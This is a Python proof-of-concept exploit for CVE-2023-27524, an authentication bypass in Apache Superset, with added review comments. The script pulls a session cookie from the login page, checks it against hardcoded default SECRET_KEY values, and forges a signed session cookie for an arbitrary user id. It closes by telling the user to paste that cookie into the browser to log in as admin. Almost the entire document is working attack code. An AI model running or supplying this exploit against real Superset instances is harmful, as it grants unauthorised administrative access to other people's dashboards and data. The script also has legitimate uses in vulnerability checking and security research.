
# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass
# Date: 10 May 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://superset.apache.org/
# Version: Apache Superset <= 2.0.1
# Tested on: 2.0.0
# CVE: CVE-2023-27524
#
# Summary: a Superset instance still running one of the well-known default /
# example SECRET_KEY values signs its Flask session cookies with a secret the
# attacker also knows. This script fetches an unauthenticated session cookie
# from /login/, checks its signature against each known default key and, on a
# match, signs a new cookie carrying an arbitrary Flask-Login user id. Nothing
# is sent back to the target; the forged cookie is only printed.
import argparse
import re
from time import sleep
from urllib.parse import urlparse

import requests
import urllib3
from flask_unsign import session
from selenium import webdriver

# NOTE(review): sleep, urlparse and webdriver are not used anywhere below;
# selenium in particular is a heavy dependency this PoC never exercises.
# Every request below is made with verify=False; this mutes the
# InsecureRequestWarning urllib3 would otherwise print for each of them.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
# Default / example SECRET_KEY values that have shipped with Superset or its
# deployment material.  A deployment still using one of them signs every Flask
# session cookie with a secret that is public knowledge (CVE-2023-27524), so
# main() tries each entry against the unauthenticated cookie it receives.
# Order matters only for which key is reported first.
SECRET_KEYS = [
    # default before 1.4.1 (the doubled backslashes are literal
    # backslash-e / backslash-y / backslash-h bytes)
    b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',
    # default from 1.4.1 onwards
    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',
    # deployment template
    b'thisISaSECRET_1234',
    # value shown in the documentation
    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',
    # docker compose
    b'TEST_NON_DEV_SECRET',
]
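def _extract_version(html: str) -> str:
    """Return the Superset ``version_string`` embedded in the login page, or ``'Unknown'``."""
    match = re.search(r'"version_string": "(.*?)"', html)
    return match.group(1) if match else 'Unknown'


def _find_default_key(cookie: str):
    """Return the first entry of ``SECRET_KEYS`` whose signature verifies ``cookie``.

    Returns ``None`` when no key matches (including the degenerate case of an
    empty ``SECRET_KEYS`` list, which the original loop left undefined).
    """
    for key in SECRET_KEYS:
        if session.verify(cookie, key):
            return key
    return None


def main() -> int:
    """Check a Superset instance for CVE-2023-27524 and print a forged session cookie.

    Steps: GET ``<url>/login/`` to obtain an unauthenticated Flask session
    cookie, confirm it decodes as a Flask cookie, report the advertised
    version, try every ``SECRET_KEYS`` entry against the cookie signature and,
    on a match, sign a new cookie whose Flask-Login ``_user_id`` is ``--id``.
    The forged cookie is only printed; it is never sent to the target.

    Command-line arguments:
        --url / -u  Base URL of the Superset instance (required).
        --id        User id placed in the forged cookie (default ``'1'``).

    Returns:
        0 when a default SECRET_KEY verified the cookie (target vulnerable),
        1 otherwise: login page not reachable, no/invalid session cookie,
        no key matched, or an unexpected error.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)
    parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')
    args = parser.parse_args()

    base = args.url.rstrip('/')
    try:
        u = base + '/login/'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
        }
        # verify=False is deliberate for a PoC (self-signed lab targets).
        # Redirects are not followed, so a 3xx from /login/ (e.g. an SSO
        # front door) is reported as an error rather than probed further.
        resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
        if resp.status_code != 200:
            print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
            return 1

        # Flask's default cookie name.  A deployment that overrides
        # SESSION_COOKIE_NAME shows up here as "no session cookie", not as safe.
        session_cookie = next((c.value for c in resp.cookies if c.name == 'session'), None)
        if not session_cookie:
            print('Error: No session cookie found')
            return 1
        print(f'Got session cookie: {session_cookie}')

        # flask_unsign raises on anything that is not a Flask cookie; the
        # former bare `except:` also swallowed KeyboardInterrupt/SystemExit.
        try:
            decoded = session.decode(session_cookie)
        except Exception:
            print('Error: Not a Flask session cookie')
            return 1
        print(f'Decoded session cookie: {decoded}')

        print(f'Superset Version: {_extract_version(resp.text)}')

        # Only a verified signature proves a known key is in use; the decoded
        # payload above is readable for any Flask cookie and proves nothing.
        k = _find_default_key(session_cookie)
        if k is None:
            print('Failed to crack session cookie')
            return 1
        print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')

        # Numeric ids are forged as int (what Superset's user table uses);
        # anything else is passed through unchanged for experimentation.
        try:
            user_id = int(args.id)
        except ValueError:
            user_id = args.id

        forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
        print(f'Forged session cookie for user {user_id}: {forged_cookie}')
        u1 = base + '/superset/welcome'

        # NOTE(review): the message assumes id 1 is an admin. That is the
        # usual first account created at install time, not a guarantee; a
        # non-existent or non-admin id simply yields a less privileged session.
        print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")
        return 0

    except Exception as e:
        print(f'Unexpected error: {e}')
        return 1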
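if __name__ == '__main__':
    # Propagate main()'s result as the process exit status so the check can be
    # scripted (0 = vulnerable/success, non-zero = not confirmed). A None result
    # still exits 0, so an unchanged main() behaves exactly as before.
    raise SystemExit(main())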